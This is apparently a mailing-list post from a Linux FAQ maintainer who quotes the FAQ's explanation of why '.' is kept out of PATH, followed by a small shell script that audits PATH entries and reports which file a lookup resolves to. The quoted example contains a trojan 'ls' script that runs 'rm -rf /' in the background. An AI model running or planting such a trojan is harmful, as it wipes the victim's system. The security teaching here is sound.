Hi,
I inherited the linux-newbie FAQ, and some of the answers in the
FAQ do not make any sense to me. So I am currently trying to fix all the
defects I can see. But I would appreciate some input on any area where
the explanation can be improved in clarity or accuracy.
A specific question. This is question 4.2 in the FAQ:
4.2 Why isn't "." in my path?
Security reasons. Consider the following scenario:
# pwd
/home/badguy
# echo *
ls
# cat ls
#!/bin/sh
/bin/ls $*
rm -rf / &
# ls
ls
[1] 219
# (sleep 30;ls)
ls: command not found.
By this time, nothing works.... / has been deleted. This example could
be avoided by putting "." after /bin in your path, and then the correct
ls would be executed. But what if the command was named "sl", and you
would have mistyped ls as "sl"? (It happens a lot.)
Does this make sense to you? I haven't understood why a person not having
'.' in his / her path would not be susceptible to the above "security
risk"?
Kenneth
--
There is no such thing as luck. 'Luck' is nothing but an absence of bad luck.
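
The PATH lookup that the quoted FAQ entry relies on, as an added example that is not part of the original post or of the FAQ. The function names audit_path and resolve_in are hypothetical and the sample PATH values are constructed; resolve_in only reports which file the walk would select and never runs it.

```shell
#!/bin/sh
# Added example, not from the FAQ. Models how a Bourne-style shell walks
# PATH so the effect of "." (or an empty entry) can be checked safely.

# audit_path PATHSTRING
# Prints "position:kind:entry" for every entry that makes the shell search
# the current directory. Returns 0 if the PATH is clean, 1 otherwise.
audit_path() {
    rest="$1:"                      # trailing ":" keeps a final empty entry
    position=0
    found=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        position=$((position + 1))
        case $entry in
            "") kind=empty ;;       # an empty entry means the current directory
            .)  kind=dot ;;
            /*) continue ;;         # absolute directory: not cwd-dependent
            *)  kind=relative ;;    # resolved against the current directory
        esac
        printf '%s:%s:%s\n' "$position" "$kind" "$entry"
        found=1
    done
    return "$found"
}

# resolve_in COMMAND PATHSTRING
# Prints the first executable file the PATH walk would pick for COMMAND,
# without running it. Returns 1 if nothing matches ("command not found").
resolve_in() {
    rest="$2:"
    while [ -n "$rest" ]; do
        dir=${rest%%:*}
        rest=${rest#*:}
        [ -n "$dir" ] || dir=.
        if [ -f "$dir/$1" ] && [ -x "$dir/$1" ]; then
            printf '%s\n' "$dir/$1"
            return 0
        fi
    done
    return 1
}

# Constructed sample PATH values: "." first, "." after /bin, no "." at all.
for sample in ".:/bin:/usr/bin" "/bin:/usr/bin:." "/bin:/usr/bin"; do
    printf 'PATH=%s\n' "$sample"
    audit_path "$sample" || true
done
```

Calling resolve_in with a command name and each PATH variant from inside an untrusted directory shows which file wins the lookup: the local copy when "." comes first, the system copy when "." comes last, and the local copy again for any name that exists only in the current directory.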